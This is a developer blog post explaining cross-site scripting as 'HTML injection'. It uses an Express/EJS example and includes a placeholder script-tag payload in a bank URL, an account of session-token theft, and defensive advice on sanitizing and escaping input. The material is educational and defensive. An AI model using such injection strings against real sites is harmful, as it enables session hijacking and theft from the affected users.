XSS aka HTML Injection Attack explained

Originally published at jamischarles.com.

I’ve been doing web dev for about 10 years now, and I’ve always found the term XSS to be very fuzzy. I knew was a term related to JavaScript in security in the browser, and it’s usually demonstrated via alert(), usually passed by url params.

Recently at work I needed to patch an app for an XSS vulnerability. I was doing research on XSS and came across this great thought (unfortunately I lost the link):

I wish we could rename XSS to HTML Injection Attack.

This is much clearer name and immediately clarifies what the danger with XSS is: The attacker sneaks some malicious JavaScript (usually via a <script> tag) into your html which is then executed.

How does this HTML Injection Attack work in practice?

Let’s say we have a node.js webapp. We’re running express.js and using ejs for our templating language.

We’re fetching the name url param and injecting it into the ejs template.

Route handler for the `/` route
EJS template file

With the following result:

The Attack

So far so good. Nothing fishy going on here. Now let’s try to insert a <script> tag into the url:

XSS attack shown in Firefox.

The attack worked. This is bad because we are allowing a (untrusted) user to execute any JavaScript they want on our page. Interestingly enough, it did not work in Chrome:

Chrome being proactive to protect against XSS

Sounds like Chrome can see that this is likely an XSS attack, and blocked it. Great!

How can this attack hurt me?

An alert box on a page is pretty harmless. So how could this actually hurt somebody?

Here’s how an attacker could use this to get access to your bank account.

  1. You’d receive an email with instructions to log into your bank.
  2. After login, you’re instructed to click on this link https://yourBankWebsite.com/account?id=<script>[maliciousCodeHere]</script>

When you login, your bank’s website server starts a session for you (usually lasting 10–15 minutes, after which you are automatically logged out). The session information (usually called a token) is stored in a cookie on your computer.

If the hacker can get you to login, and then click the link he sent you, then maliciousCodeHere will run, and could send your session token to the hacker.

This allows him to steal your session. He could then (in theory) create a cookie on his computer and store your session information in it. If that session is still active, he can visit your banks website, and he’ll be logged in as you, and can browse around, look at bank account information, and possibly even initiate a transfer or change your password.

In summary, the hacker sent you a link, which caused you to run JavaScript in your browser, after you logged in, allowing him to steal protected information (in this case, the session token). This is dangerous because you are running unsafe JS after you’ve been given access to your sensitive info.

How to protect against an HTML Injection Attack

The general rule is this:

Treat any user input as unsafe.

This means that we need to sanitize any user-provided values. There are a number of libraries that do that for you, so I won’t call any out specifically.

There are several places you could sanitize. In general you should sanitize on the server, because any client-side sanitization could be circumvented by an attacker.

Sanitizing at the templating layer

The most common place to sanitize is at the templating layer, and most templating languages have built in support for this. In EJS, you use <%= name %>by default because it sanitizes by encoding any html tags, so any <script> tag will show up as &lt;script&gt; in the html and <script> tag on the webpage. This means it’ll be rendered and not executed. You are safe. In my attack example above I used <%- name instead of <%= name. <%- in EJS will render raw html that won’t be sanitized, and should thus be avoided with user input.

If you have your own templating solution or use es6 template strings, you should sanitize your user values via some XSS library. At the very least you could strip out common XSS attack strings like <script> from the input.

Sanitizing at the storage layer

If you are saving any values to a database (like URL names, or user names, or emails) that will be displayed to the user, this is a prime location for an HTML injection attack. If I can store <script>[maliciousCode]</script> as my display name for a social site, then anybody else who sees my name could potentially run my code in their browser and I can steal their credentials. Sanitizing before you save any values from user input is a must.

Sanitizing at the url param layer

This is my least favorite option, but you could add some middleware that sanitizes all the route parameters like so:

Example showing middleware to sanitize route params

In Summary

In summary, HTML Injection Attacks (XSS) are usually about injecting unsafe JS into the HTML (often via the URL) in order to get a victim to run that malicious JS in their browser to steal info they have access to because they’ve logged in.

Treat all user input as unsafe, and sanitize it.